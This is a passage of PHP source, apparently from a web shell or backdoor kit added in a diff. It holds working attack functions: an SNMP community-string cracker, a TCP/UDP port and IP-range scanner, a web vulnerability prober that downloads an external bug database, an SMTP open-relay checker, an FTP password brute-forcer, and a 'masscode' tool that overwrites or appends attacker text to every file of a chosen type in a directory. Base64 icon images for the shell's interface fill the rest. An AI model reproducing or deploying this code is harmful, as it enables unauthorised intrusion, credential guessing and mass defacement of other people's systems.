    "; +} + +if ($act == "snmp") +{ +global $t,$et,$errorbox,$crack,$hcwd; +if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ +$target=$_REQUEST['target']; +$dictionary=fopen($_REQUEST['dictionary'],'r'); +if ($dictionary){ +echo "Cracking ".htmlspecialchars($target)."...
    ";flusheR(); +while(!feof($dictionary)){ +$com=trim(fgets($dictionary)," \n\r"); +$res=snmpchecK($target,$com,2); +if($res)echo "$com
    "; +flusheR(); +} +echo "
    Done
    "; +fclose($dictionary); +} +else{ +echo "$errorbox Can not open dictionary.$et"; +} +} + echo "
    SNMP cracker:$hcwd
    Dictionary:
    Server:
    "; +} + + + +if ($act == "scanner") +{ +global $hcwd; +if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; +$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; +if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ +$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; +echo "Port scanning started against ".htmlspecialchars($target).":
    "; +$start=time(); +for($i=$from;$i<=$to;$i++){ +if($tcp){ +if (checkthisporT($target,$i,$timeout)){ +$nu++; +$ser=""; +if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; +echo "$nu) $i $ser (Connect) [TCP]
    "; +} +} +if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]
    ";} +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)
    "; +} +elseif (!empty($_REQUEST['securityscanner'])){ +echo ""; +$start=time(); +$from=$_REQUEST['from']; +$to=(int)$_REQUEST['to']; +$timeout=(int)$_REQUEST['timeout']; +$f = substr($from,strrpos($from,".")+1); +$from = substr($from,0,strrpos($from,".")); +if(!empty($_REQUEST['httpscanner'])){ +echo "Loading webserver bug list..."; +flusheR(); +$buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); +$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); +if($dl){$file=file($buglist);echo "Done! scanning started.

    ";}else echo "Failed!!! scanning started without webserver security testing...

    "; +flusheR(); +}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:

    ";} +for($i=$f;$i<=$to;$i++){ +$output=0; +$ip="$from.$i"; +if(!empty($_REQUEST['nslookup'])){ +$hn=gethostbyaddr($ip); +if($hn!=$ip)echo "$ip [$hn]
    ";} +flusheR(); +if(!empty($_REQUEST['ipscanner'])){ +$port=$_REQUEST['port']; +if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; +$open=$ser=""; +foreach($p as $po){ +$scan=checkthisporT($ip,$po,$timeout); +if ($scan){ +$ser=""; +if($ser=getservbyport($po,"tcp"))$ser="($ser)"; +$open.=" $po$ser "; +} +} +if($open){echo "$ip) Open ports:$open
    ";$output=1;} +flusheR(); +} +if(!empty($_REQUEST['httpbanner'])){ +$res=get_sw_namE($ip,$timeout); +if($res){ +echo "$ip) Webserver software: "; +if($res==-1)echo "Unknow"; +else echo $res; +echo "
    "; +$output=1; +} +flusheR(); +} +if(!empty($_REQUEST['httpscanner'])){ +if(checkthisporT($ip,80,$timeout) && !empty($file)){ +$admin=array('/admin/','/adm/'); +$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); +$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); +$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); +foreach ($file as $v){ +$vuln=array(); +$v=trim($v); +if(!$v || $v{0}=='#')continue; +$v=str_replace('","','^',$v); +$v=str_replace('"','',$v); +$vuln=explode('^',$v); +$page=$cqich=$nukech=$adminch=$userch=$vuln[1]; +if(strstr($page,'@CGIDIRS')) +foreach($cgi as $cg){ +$cqich=str_replace('@CGIDIRS',$cg,$page); +$url="http://$ip$cqich"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";} +flusheR(); +} +elseif(strstr($page,'@ADMINDIRS')) +foreach ($admin as $cg){ +$adminch=str_replace('@ADMINDIRS',$cg,$page); +$url="http://$ip$adminch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";} +flusheR(); +} +elseif(strstr($page,'@USERS')) +foreach ($users as $cg){ +$userch=str_replace('@USERS',$cg,$page); +$url="http://$ip$userch"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";} +flusheR(); +} +elseif(strstr($page,'@NUKE')) +foreach ($nuke as $cg){ +$nukech=str_replace('@NUKE',$cg,$page); +$url="http://$ip$nukech"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";} +flusheR(); +} +else{ +$url="http://$ip$page"; +$res=check_urL($url,$vuln[3],$vuln[2],$timeout); +if($res){$output=1;echo "$ip)".$vuln[4]." $url
    ";} +flusheR(); +} +} +} +} +if(!empty($_REQUEST['smtprelay'])){ +if(checkthisporT($ip,25,$timeout)){ +$res=''; +$res=checksmtP($ip,$timeout); +if($res==1){echo "$ip) SMTP relay found.
    ";$output=1;}flusheR(); +} +} +if(!empty($_REQUEST['snmpscanner'])){ +if(checkthisporT($ip,161,$timeout,1)){ +$com=$_REQUEST['com']; +$coms=$res=""; +if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; +foreach ($c as $v){ +$ret=snmpchecK($ip,$v,$timeout); +if($ret)$coms .=" $v "; +} +if ($coms!=""){echo "$ip) SNMP FOUND: $coms
    ";$output=1;} +flusheR(); +} +} +if(!empty($_REQUEST['ftpscanner'])){ +if(checkthisporT($ip,21,$timeout)){ +$usps=explode(',',$_REQUEST['userpass']); +foreach ($usps as $v){ +$user=substr($v,0,strpos($v,':')); +$pass=substr($v,strpos($v,':')+1); +if($pass=='[BLANK]')$pass=''; +$ftp=@ftp_connect($ip,21,$timeout); +if ($ftp){ +if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) $ip System type: ".ftp_systype($ftp)."
    ";} +} +flusheR(); +} +} +} +if($output)echo "
    "; +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)
    "; +if(!empty($buglist))unlink($buglist); +} +else{ +$chbox=(extension_loaded('sockets'))?"TCPUDP":""; +echo "

    Port scanner:
    Target:
    From:
    To:
    Timeout:
    $chbox$hcwd
    "; +$host = substr($host,0,strrpos($host,".")); +echo "
    security scanner:
    From: NS lookup
    To:xxx.xxx.xxx.$hcwd
    Timeout:
    Port scanner:
    Get web bannerWebserver security scanning   SMTP relay check
    FTP password:
    SNMP:

    "; +} +} + +if ($act == "masscode") +{ +if(isset($_POST['dir']) && + $_POST['dir'] != '' && + isset($_POST['filetype']) && + $_POST['filetype'] != '' && + isset($_POST['mode']) && + $_POST['mode'] != '' && + isset($_POST['message']) && + $_POST['message'] != '' + ) + { + $dir = $_POST['dir']; + $filetype = $_POST['filetype']; + $message = $_POST['message']; + + $mode = "a"; //default mode + + + // Modes Begin + + if($_POST['mode'] == 'Apender') + { + $mode = "a"; + } + if($_POST['mode'] == 'Overwriter') + { + $mode = "w"; + } + + if($handle = opendir($dir)) + { + ?> + Overwritten Files :- +
      + +
    • ">
    • + Permission Denied

      "; break; + fwrite($fd,$message); + } + } + ?> +
    + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    + Directory + + +
    + Mode + + +
    + File Type + + +
    + +
    + +
    + + +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". + +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", + +"back"=> + +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". + +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". + +"Wg0JADs=", + +"buffer"=> + +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". + +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". + +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", + +"change"=> + +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". + +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". + +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". + +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". + +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". + +"zMshADs=", + +"delete"=> + +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". + +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". + +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". + +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". + +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". + +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". + +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". + +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". + +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", + +"download"=> + +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". + +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", + +"forward"=> + +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". + +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". + +"WqsJADs=", + +"home"=> + +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". + +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". + +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", + +"mode"=> + +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". + +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". + +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", + +"refresh"=> + +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". + +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". + +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". + +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", + +"search"=> + +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". + +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". + +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". + +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". + +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", + +"setup"=> + +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". + +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". + +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". + +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". + +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", + +"small_dir"=> + +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". + +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", + +"small_unk"=> + +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". + +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". + +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". + +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". + +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". + +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". + +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". + +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". + +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". + +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". + +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". + +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". + +"yAsokBkQADs=", + +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". + +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", + +"sort_asc"=> + +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". + +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", + +"sort_desc"=> + +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". + +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", + +"sql_button_drop"=> + +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". + +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". + +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". + +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". + +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". + +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". + +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". + +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". + +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". + +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". + +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". + +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". + +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". + +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". + +"AQEAOw==", + +"sql_button_empty"=> + +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". + +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". + +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". + +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". + +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". + +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". + +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". + +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". + +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". + +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". + +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". + +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". + +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". + +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", + +"sql_button_insert"=> + +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". + +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". + +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". + +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". + +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". + +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". + +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". + +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". + +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". + +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". + +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". + +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". + +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". + +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", + +"up"=> + +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". + +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". + +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", + +"write"=> + +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". + +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". + +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". + +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", + +"ext_asp"=> + +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". + +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". + +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", + +"ext_mp3"=> + +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". + +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". + +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", + +"ext_avi"=> + +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". + +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". + +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", + +"ext_cgi"=> + +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". + +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". + +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". + +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". + +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". + 